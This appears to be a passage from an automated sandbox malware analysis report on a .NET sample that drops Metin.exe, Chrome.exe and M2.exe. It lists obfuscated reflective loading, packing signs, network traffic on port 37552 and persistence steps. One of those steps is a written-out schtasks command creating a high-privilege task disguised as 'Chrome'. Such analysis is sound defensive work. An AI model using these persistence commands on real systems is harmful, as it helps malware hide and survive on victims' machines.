                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QBTQa3EkUuQM9en7BwZr2kZOc9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _7TYyauswT86zftRyKQ8xrzJIDf System.AppDomain.Load(byte[])
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6 System.AppDomain.Load(byte[])
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs.Net Code: _1Qh83CN4t4PWCm5D3YGB9r8Sp6
                        Source: M2.exe.1.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                        Source: f5ATZ1i5CU.exeStatic PE information: real checksum: 0x3ca9f should be: 0x41ded
                        Source: M2.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1a5fb
                        Source: Chrome.exe.9.drStatic PE information: real checksum: 0x0 should be: 0xe5c2
                        Source: Metin.exe.1.drStatic PE information: real checksum: 0x0 should be: 0xe5c2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03616348 pushad ; ret 2_2_03616351
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03616F17 pushad ; ret 2_2_03616F23
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03613D1D push edx; retn 0008h2_2_03613D32
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE8BE0 push esi; ret 2_2_08EE8BFA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE8B50 push esi; ret 2_2_08EE8C0A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE6477 push cs; ret 2_2_08EE6482
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE8C05 push esi; ret 2_2_08EE8C0A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE8C10 push edi; ret 2_2_08EE8C1A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE7E1F push ds; ret 2_2_08EE7E7A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF7C131D2A5 pushad ; iretd 14_2_00007FF7C131D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FF7C1502316 push 8B485F93h; iretd 14_2_00007FF7C150231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FF7C133D2A5 pushad ; iretd 17_2_00007FF7C133D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FF7C14519D2 pushad ; ret 17_2_00007FF7C14519E1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FF7C1522316 push 8B485F91h; iretd 17_2_00007FF7C152231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF7C132D2A5 pushad ; iretd 19_2_00007FF7C132D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF7C1512316 push 8B485F92h; iretd 19_2_00007FF7C151231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF7C1517CED push eax; retf 19_2_00007FF7C1517D79
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF7C131D2A5 pushad ; iretd 21_2_00007FF7C131D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FF7C1502316 push 8B485F93h; iretd 21_2_00007FF7C150231B
                        Source: Metin.exe.1.dr, dazezEcwr0A.cs | High entropy of concatenated method names
                        Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | High entropy of concatenated method names
                        Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | High entropy of concatenated method names
                        Source: Metin.exe.1.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs | High entropy of concatenated method names
                        Source: Metin.exe.1.dr, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.cs | High entropy of concatenated method names
                        Source: Metin.exe.1.dr, kd50mwQPPSzvaDpyAZGMQuS07X.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, dazezEcwr0A.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.cs | High entropy of concatenated method names
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, kd50mwQPPSzvaDpyAZGMQuS07X.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, dazezEcwr0A.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, XjfjZwUJ2UumixvUmzb0NzvetX.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.cs | High entropy of concatenated method names
                        Source: Chrome.exe.9.dr, kd50mwQPPSzvaDpyAZGMQuS07X.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, dazezEcwr0A.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, XjfjZwUJ2UumixvUmzb0NzvetX.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, KNnYBtToP0VH22pwbP5VW1oo8fxLkXhVdblh178AA83QbLmYEDNeSJF8k0GnBAgRY4WvSVrCb0g4wF75LQSw.cs | High entropy of concatenated method names
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, kd50mwQPPSzvaDpyAZGMQuS07X.cs | High entropy of concatenated method names
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | File created: C:\Users\user\AppData\Roaming\Metin.exe
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | File created: C:\Users\user\AppData\Roaming\Chrome.exe
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | File created: C:\Users\user\AppData\Roaming\M2.exe

                        Boot Survival

                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.lnk
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49885 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49923 -> 37552
                        Source: unknown | Network traffic detected: HTTP traffic on port 49960 -> 37552
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Metin.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
